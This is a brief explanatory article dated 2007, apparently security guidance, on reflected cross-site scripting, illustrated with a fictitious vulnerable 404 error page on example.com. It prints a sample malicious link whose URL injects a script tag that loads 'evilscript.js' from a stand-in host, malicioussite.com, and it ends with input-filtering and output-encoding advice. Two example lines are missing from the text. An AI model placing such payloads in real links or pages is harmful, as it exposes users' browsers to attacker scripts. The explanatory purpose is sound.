Cross-Site Scripting (XSS)
The essence of cross-site scripting is that an attacker uses a specially crafted URL to cause a web site to return arbitrary content (often script or HTML) to a victim's web browser. An attacker may use social engineering techniques to entice the user to click on the specially crafted URL. The malicious script runs with the privileges of a legitimate script originating from the legitimate web site. Many web applications are vulnerable to such a technique. The following example uses a fictitious XSS vulnerability in a default error page.
For example, A valid URL request might be
However, if the requested document "FILENAME.html" did not exist, the web site could return an error message such as
404 page does not exist: FILENAME.html
Notice that "FILENAME.html" is a string that was inputed by a user and is included in the page returned by the web site straight to the client's browser.
If a malicious web site offered a link to example.com that looked something like this
<A HREF="http://www.example.com/<script%20SRC='http://www.malicioussite.com/evilscript.js'></script>">Click Here</a>
then the "FILENAME.html" submitted to example.com is
and example.com uses its ordinary routines to generate an error page to you that reads
<HTML> 404 page not found: <script SRC='http://www.malicioussite.com/evilscript.js'></script> .... </HTML>
The ultimate fix to this problem involves recoding a very large number of web sites so that they properly filter and validate the input they receive and properly encode or filter the output before returning it to the user or acting upon it. This process is a very large undertaking.
Last updated July 2, 2007